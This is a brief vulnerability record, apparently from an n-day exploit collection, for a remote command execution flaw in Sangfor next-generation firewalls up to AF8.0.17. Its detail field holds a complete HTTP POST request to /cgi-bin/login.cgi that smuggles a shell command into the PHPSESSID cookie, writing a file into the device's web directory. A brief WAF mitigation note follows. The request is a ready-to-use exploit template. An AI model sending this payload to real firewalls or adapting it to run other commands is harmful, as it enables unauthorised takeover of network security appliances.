vendor = "深信服"
name = "深信服-下一代防火墙-RCE"
type = "RCE"
version = "<=AF8.0.17"
path = "/cgi-bin/login.cgi"
detail = "POST /cgi-bin/login.cgi HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36 Connection: close Content-Length: 112 Content-Type: Application/X-www-Form Cookie: PHPSESSID=`$(echo 156828301~ > /fwlib/sys/virus/webui/svpn_html/qwer.txt)`; Accept-Encoding: gzip {\\\"opr\\\":\\\"login\\\", \\\"data\\\":{\\\"user\\\": \\\"watchTowr\\\" , \\\"pwd\\\": \\\"watchTowr\\\" , \\\"vericode\\\": \\\"EINW\\\" , \\\"privacy_enable\\\": \\\"0\\\"}}"
fix = "WAF封禁路路径，等待发布补丁"
date = "0726"
label = "nday"
